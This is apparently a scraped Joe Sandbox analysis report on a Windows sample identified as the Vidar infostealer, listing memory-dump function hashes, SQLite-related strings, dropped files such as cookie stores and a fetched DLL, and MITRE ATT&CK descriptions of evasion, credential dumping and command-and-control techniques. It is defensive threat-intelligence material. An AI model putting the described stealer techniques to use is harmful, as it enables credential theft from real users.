Instruction Fuzzy Hash: 15119DB56083409BD704CF29D84575FBBE4AFC8229F85086EE98A87390E774E508CB93

Function 1D78EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

SELECT %s WHERE rowid = ?, xrefs: 1D78F017

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: SELECT %s WHERE rowid = ?
API String ID: 0-866778640
Opcode ID: 5ca11579b123db3cb7873781f5b421dd3904b78a3e55f1ce97302a3061968a76
Instruction ID: 3256696dc727c60a79c56a9b5806ea6c4fcb454de9b1f0ecba83bc442d1e08c9
Opcode Fuzzy Hash: 5ca11579b123db3cb7873781f5b421dd3904b78a3e55f1ce97302a3061968a76
Instruction Fuzzy Hash: AB11257230438AAFD7204B9AEC40FA2F794EB40232F10852FF65996641EB73B45187A2

Function 1D767200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 1D767220
invalid, xrefs: 1D76721B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$invalid
API String ID: 0-3574585026
Opcode ID: 473fd52322db5df2efa5683adea252b83c3ea97525c6594ea04f62dc9eccabc8
Instruction ID: 6336271a695ede827aec02a868463d336ad146db2297bcb8720d20e762de2752
Opcode Fuzzy Hash: 473fd52322db5df2efa5683adea252b83c3ea97525c6594ea04f62dc9eccabc8
Instruction Fuzzy Hash: 70F0C871B046109FEF105928EC14BB3B7B65B41371F01469AF95693691F321E45486A3

Function 1D7485B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

CREATE TABLE x(sql,ncol,ro,busy,nscan,nsort,naidx,nstep,reprep,run,mem), xrefs: 1D7485B6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(sql,ncol,ro,busy,nscan,nsort,naidx,nstep,reprep,run,mem)
API String ID: 0-3640693396
Opcode ID: 0c91f2307c151cf47a874722f30963791526c0fb43456bbbf61420453027f244
Instruction ID: 3baf543ded35731e810e280805de1d6f45ae66a3c736e6ac35609cc0b3e422dd
Opcode Fuzzy Hash: 0c91f2307c151cf47a874722f30963791526c0fb43456bbbf61420453027f244
Instruction Fuzzy Hash: FAF0F0316042558AC3019B1EFC01B9AE3D49FD1232F06816BF908DB221E7A4E882C7A3

Function 1D813C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

%z%s%z, xrefs: 1D813C6B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %z%s%z
API String ID: 0-3434679432
Opcode ID: 71936c7021c6c6afeaed230fd9ba94531e5f78801d59fc4fa0b1f718de73c0fc
Instruction ID: cc56b4ff9c555923bcbee1b0224f81bcb1556e65375eb5038b8498e00c6f5fb7
Opcode Fuzzy Hash: 71936c7021c6c6afeaed230fd9ba94531e5f78801d59fc4fa0b1f718de73c0fc
Instruction Fuzzy Hash: 9BF082B0504702AFE710CB25E95067772E8FF84215F54496DFC8ACA511E735F9498A53

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 82xul16VKj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\GHDAAKJEGCFC\BAEBGC

C:\ProgramData\GHDAAKJEGCFC\BGDGHJ

C:\ProgramData\GHDAAKJEGCFC\DGHCBA

C:\ProgramData\GHDAAKJEGCFC\IDHIEG

C:\ProgramData\GHDAAKJEGCFC\KKKEBK

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll

C:\Users\user\AppData\Local\Temp\CabAB7C.tmp

C:\Users\user\AppData\Local\Temp\TarAB7D.tmp

C:\Users\user\AppData\Local\Temp\kat2B07.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4N90MZIH.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txt

Windows Analysis Report
82xul16VKj.exe

Function 02EEBEF0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 317
memoryfilenativeCOMMON

Function 02EEB250 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191
filenativeCOMMON

Function 02EEB510 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Function 02EEB9B0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Function 02EEC510 Relevance: .1, Instructions: 92
COMMON

Function 1D744CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Function 1D9105B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Function 1D73FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134
fileCOMMON

Function 1D8E066B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Function 1D7604D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre